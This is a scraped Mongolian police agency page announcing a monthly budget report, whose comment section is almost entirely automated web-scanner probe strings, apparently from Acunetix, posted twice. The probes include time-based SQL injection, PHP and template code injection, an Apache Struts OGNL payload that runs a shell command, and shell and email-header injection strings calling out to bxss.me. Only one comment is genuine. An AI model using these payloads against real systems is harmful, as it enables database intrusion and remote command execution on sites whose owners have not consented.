• Нүүр хуудас
  • Системүүд
  • Харьяа нэгжүүд
  • Холбоо барих
  • Асуулт хариулт
  • Иргэний хяналт

Цагдаагийн ерөнхий газрын 2019 оны 04 дүгээр сарын төсвийн гүйцэтгэлийн сарын мэдээ

2019-05-06
Цагдаагийн ерөнхий газрын 2019 оны 04 дүгээр сарын төсвийн гүйцэтгэлийн сарын мэдээ
e XOA5s10i'));select pg_sleep(3); --
2019-06-03 Хариулах
e OsweSRxU';select pg_sleep(3); --
2019-06-03 Хариулах
e tC7Ap5E8');select pg_sleep(3); --
2019-06-03 Хариулах
e -1);select pg_sleep(9); --
2019-06-03 Хариулах
e -1));select pg_sleep(3); --
2019-06-03 Хариулах
e z27p7ljF'; waitfor delay '0:0:9' --
2019-06-03 Хариулах
e -1;select pg_sleep(9); --
2019-06-03 Хариулах
e -1); waitfor delay '0:0:9' --
2019-06-03 Хариулах
e 1 waitfor delay '0:0:9' --
2019-06-03 Хариулах
e (select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/
2019-06-03 Хариулах
e -1; waitfor delay '0:0:6' --
2019-06-03 Хариулах
e if(now()=sysdate(),sleep(3),0)
2019-06-03 Хариулах
e 0'XOR(if(now()=sysdate(),sleep(3),0))XOR'Z
2019-06-03 Хариулах
e 0"XOR(if(now()=sysdate(),sleep(6),0))XOR"Z
2019-06-03 Хариулах
e -1" OR 2+129-129-1=0+0+0+1 --
2019-06-03 Хариулах
e -1" OR 3+129-129-1=0+0+0+1 --
2019-06-03 Хариулах
e -1' OR 3+85-85-1=0+0+0+1 or 'ZDl0o4nB'='
2019-06-03 Хариулах
e -1' OR 2+761-761-1=0+0+0+1 --
2019-06-03 Хариулах
e -1' OR 3+761-761-1=0+0+0+1 --
2019-06-03 Хариулах
e -1' OR 2+85-85-1=0+0+0+1 or 'ZDl0o4nB'='
2019-06-03 Хариулах
e -1 OR 2+981-981-1=0+0+0+1
2019-06-03 Хариулах
e -1 OR 3+981-981-1=0+0+0+1
2019-06-03 Хариулах
e uS8i0OWs
2019-06-03 Хариулах
e -1 OR 2+935-935-1=0+0+0+1 --
2019-06-03 Хариулах
e -1 OR 3+935-935-1=0+0+0+1 --
2019-06-03 Хариулах
e 1
2019-06-03 Хариулах
e 1
2019-06-03 Хариулах
e create/.
2019-06-03 Хариулах
e create
2019-06-03 Хариулах
e create
2019-06-03 Хариулах
e 1DD4GbXTYzO
2019-06-03 Хариулах
e '"
2019-06-03 Хариулах
e ${@print(md5(acunetix_wvs_security_test))}\
2019-06-03 Хариулах
e
2019-06-03 Хариулах
e ';print(md5(acunetix_wvs_security_test));$a='
2019-06-03 Хариулах
e ";print(md5(acunetix_wvs_security_test));$a="
2019-06-03 Хариулах
e ${@print(md5(acunetix_wvs_security_test))}
2019-06-03 Хариулах
e )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
2019-06-03 Хариулах
e ;print(md5(acunetix_wvs_security_test));
2019-06-03 Хариулах
e '),request,#_memberAccess['allowPrivateAccess']=true,#_memberAccess['allowProtectedAccess']=true,#_memberAccess['allowPackageProtectedAccess']=true,#_memberAccess['allowStaticMethodAccess']=true,#_memberAccess['excludedPackageNamePatterns']=#_memberAccess['acceptProperties'],#_memberAccess['excludedClasses']=#_memberAccess['acceptProperties'],new java.net.URL('http'+'://hitM63rTLk1qF.bxss.me/').openStream().close(),new java.lang.String('
2019-06-03 Хариулах
e bxss.me
2019-06-03 Хариулах
e ^(#$!@#$)(()))******
2019-06-03 Хариулах
e Http://bxss.me/t/fit.txt
2019-06-03 Хариулах
e http://bxss.me/t/fit.txt?.jpg
2019-06-03 Хариулах
e http://hityRA6iGluom.bxss.me/
2019-06-03 Хариулах
e bxss.me/t/xss.html?%00
2019-06-03 Хариулах
e )
2019-06-03 Хариулах
e http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
2019-06-03 Хариулах
e !(()&&!|*|*|
2019-06-03 Хариулах
e 1some_inexistent_file_with_long_name.jpg
2019-06-03 Хариулах
e HttP://bxss.me/t/xss.html?%00
2019-06-03 Хариулах
e '+response.write(9524875*9447839)+'
2019-06-03 Хариулах
e "+response.write(9524875*9447839)+"
2019-06-03 Хариулах
e response.write(9524875*9447839)
2019-06-03 Хариулах
e #{9999639+10000481}
2019-06-03 Хариулах
e ${9999639+10000481}
2019-06-03 Хариулах
e %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='nslookup bxss.me ns1.bxss.me').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
2019-06-03 Хариулах
e to@example.com> bcc:063738.80-73662.80.075ed.18050.2@bxss.me
2019-06-03 Хариулах
e set|set&set
2019-06-03 Хариулах
e $(nslookup dns.ce.\063738.80-73660.80.075ed.\1.bxss.me)
2019-06-03 Хариулах
e bcc:063738.80-73659.80.075ed.18050.2@bxss.me
2019-06-03 Хариулах
e &nslookup dns.ce.\063738.80-73661.80.075ed.\1.bxss.me&'\"`0&nslookup dns.ce.\063738.80-73661.80.075ed.\1.bxss.me&`'
2019-06-03 Хариулах
e �''�""
2019-06-03 Хариулах
e JyI=
2019-06-03 Хариулах
e �'�"
2019-06-03 Хариулах
e @@qByHa
2019-06-03 Хариулах
e \
2019-06-03 Хариулах
e 1����%2527%2522
2019-06-03 Хариулах
e 1'"
2019-06-03 Хариулах
норжмаа хүүхэдийн гэмт хэргийн мэдээлэл
2019-05-11 Хариулах
e XOA5s10i'));select pg_sleep(3); --
2019-05-11
e OsweSRxU';select pg_sleep(3); --
2019-05-11
e tC7Ap5E8');select pg_sleep(3); --
2019-05-11
e -1);select pg_sleep(9); --
2019-05-11
e -1));select pg_sleep(3); --
2019-05-11
e z27p7ljF'; waitfor delay '0:0:9' --
2019-05-11
e -1;select pg_sleep(9); --
2019-05-11
e -1); waitfor delay '0:0:9' --
2019-05-11
e 1 waitfor delay '0:0:9' --
2019-05-11
e (select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/
2019-05-11
e -1; waitfor delay '0:0:6' --
2019-05-11
e if(now()=sysdate(),sleep(3),0)
2019-05-11
e 0'XOR(if(now()=sysdate(),sleep(3),0))XOR'Z
2019-05-11
e 0"XOR(if(now()=sysdate(),sleep(6),0))XOR"Z
2019-05-11
e -1" OR 2+129-129-1=0+0+0+1 --
2019-05-11
e -1" OR 3+129-129-1=0+0+0+1 --
2019-05-11
e -1' OR 3+85-85-1=0+0+0+1 or 'ZDl0o4nB'='
2019-05-11
e -1' OR 2+761-761-1=0+0+0+1 --
2019-05-11
e -1' OR 3+761-761-1=0+0+0+1 --
2019-05-11
e -1' OR 2+85-85-1=0+0+0+1 or 'ZDl0o4nB'='
2019-05-11
e -1 OR 2+981-981-1=0+0+0+1
2019-05-11
e -1 OR 3+981-981-1=0+0+0+1
2019-05-11
e uS8i0OWs
2019-05-11
e -1 OR 2+935-935-1=0+0+0+1 --
2019-05-11
e -1 OR 3+935-935-1=0+0+0+1 --
2019-05-11
e 1
2019-05-11
e 1
2019-05-11
e create/.
2019-05-11
e create
2019-05-11
e create
2019-05-11
e 1DD4GbXTYzO
2019-05-11
e '"
2019-05-11
e ${@print(md5(acunetix_wvs_security_test))}\
2019-05-11
e
2019-05-11
e ';print(md5(acunetix_wvs_security_test));$a='
2019-05-11
e ";print(md5(acunetix_wvs_security_test));$a="
2019-05-11
e ${@print(md5(acunetix_wvs_security_test))}
2019-05-11
e )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
2019-05-11
e ;print(md5(acunetix_wvs_security_test));
2019-05-11
e '),request,#_memberAccess['allowPrivateAccess']=true,#_memberAccess['allowProtectedAccess']=true,#_memberAccess['allowPackageProtectedAccess']=true,#_memberAccess['allowStaticMethodAccess']=true,#_memberAccess['excludedPackageNamePatterns']=#_memberAccess['acceptProperties'],#_memberAccess['excludedClasses']=#_memberAccess['acceptProperties'],new java.net.URL('http'+'://hitM63rTLk1qF.bxss.me/').openStream().close(),new java.lang.String('
2019-05-11
e bxss.me
2019-05-11
e ^(#$!@#$)(()))******
2019-05-11
e Http://bxss.me/t/fit.txt
2019-05-11
e http://bxss.me/t/fit.txt?.jpg
2019-05-11
e http://hityRA6iGluom.bxss.me/
2019-05-11
e bxss.me/t/xss.html?%00
2019-05-11
e )
2019-05-11
e http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
2019-05-11
e !(()&&!|*|*|
2019-05-11
e 1some_inexistent_file_with_long_name.jpg
2019-05-11
e HttP://bxss.me/t/xss.html?%00
2019-05-11
e '+response.write(9524875*9447839)+'
2019-05-11
e "+response.write(9524875*9447839)+"
2019-05-11
e response.write(9524875*9447839)
2019-05-11
e #{9999639+10000481}
2019-05-11
e ${9999639+10000481}
2019-05-11
e %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='nslookup bxss.me ns1.bxss.me').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
2019-05-11
e to@example.com> bcc:063738.80-73662.80.075ed.18050.2@bxss.me
2019-05-11
e set|set&set
2019-05-11
e $(nslookup dns.ce.\063738.80-73660.80.075ed.\1.bxss.me)
2019-05-11
e bcc:063738.80-73659.80.075ed.18050.2@bxss.me
2019-05-11
e &nslookup dns.ce.\063738.80-73661.80.075ed.\1.bxss.me&'\"`0&nslookup dns.ce.\063738.80-73661.80.075ed.\1.bxss.me&`'
2019-05-11
e �''�""
2019-05-11
e JyI=
2019-05-11
e �'�"
2019-05-11
e @@qByHa
2019-05-11
e \
2019-05-11
e 1����%2527%2522
2019-05-11
e 1'"
2019-05-11